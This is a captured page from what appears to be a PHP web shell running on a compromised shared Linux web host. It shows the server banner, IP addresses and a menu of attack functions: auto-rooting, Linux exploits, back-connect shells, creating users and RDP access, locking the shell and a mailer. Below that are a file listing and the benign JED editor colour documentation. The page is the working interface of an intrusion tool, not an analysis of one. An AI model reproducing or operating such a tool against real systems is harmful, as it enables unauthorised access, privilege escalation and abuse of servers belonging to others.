Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
jed-common /
txt /
[ HOME SHELL ]
Name
Size
Permission
Action
abbrev.txt
7.28
KB
-rw-r--r--
color.txt
1.64
KB
-rw-r--r--
compile.txt
2.2
KB
-rw-r--r--
dfa.txt
8.8
KB
-rw-r--r--
edt.txt
2.45
KB
-rw-r--r--
emacs.txt
8.53
KB
-rw-r--r--
filelock.txt
1.08
KB
-rw-r--r--
fold.txt
5.89
KB
-rw-r--r--
hooks.txt
19.85
KB
-rw-r--r--
ide-mode.txt
7.65
KB
-rw-r--r--
jed_faq.txt
18.17
KB
-rw-r--r--
linux-keys.txt
1.05
KB
-rw-r--r--
menus.txt
1.84
KB
-rw-r--r--
mouse.txt
6.64
KB
-rw-r--r--
pc-keys.txt
3.78
KB
-rw-r--r--
program.txt
5.13
KB
-rw-r--r--
rgrep.txt
1.25
KB
-rw-r--r--
rmail.txt
3.75
KB
-rw-r--r--
script.txt
4.05
KB
-rw-r--r--
syntax.txt
2.47
KB
-rw-r--r--
undo.txt
264
B
-rw-r--r--
utf8.txt
3.56
KB
-rw-r--r--
wjed.txt
7.65
KB
-rw-r--r--
wordstar.txt
1.76
KB
-rw-r--r--
xjed.txt
6.21
KB
-rw-r--r--
xrenderfont.txt
868
B
-rw-r--r--
yankpop.txt
4.44
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : color.txt
This is a short note explaining how to use JED with a color terminal. This only applies to Unix and VMS. This is particularly relevant if you want to exploit JED's ability to do color syntax highlighting on a character based terminal. *Note: If you use MS-Kermit as a terminal emulator, you will need to tell it what foreground/background colors you want via the `set term color' function. For example, if you choose back on white as the `normal' color, put `set term color 30 47' in your MSKermit.ini file. This same comment applies to other color terminals which emulate this flawed color model. To use JED with a color terminal, it is necessary that the terminal understand ANSI color escape sequences. If so, then it is possible to set up JED to use different foreground and background colors for the modeline, region highlighting, syntax highlighting, etc... To turn on ANSI color support, set the variable `USE_ANSI_COLORS' to a non-zero value. If set to zero, the support is turned off. The colors may be specified using the set_color function as illustrated in jed.rc. They only become active if USE_ANSI_COLORS is non-zero. Unfortunately, few termcaps provide information regarding whether the terminal is a color one or not. To interactively set USE_ANSI_COLORS, simply press `Ctrl-X ESC' and enter USE_ANSI_COLORS = 1 at the `S-Lang>' prompt. This variable is automatically set to a non-zero value by jed if environment variable COLORTERM exists. Finally, you could simply put: define term_use_colors () { USE_ANSI_COLORS = 1; } in your jed.rc (.jedrc) and define (alias) jed to be: alias colorjed 'jed -f term_use_colors'
Close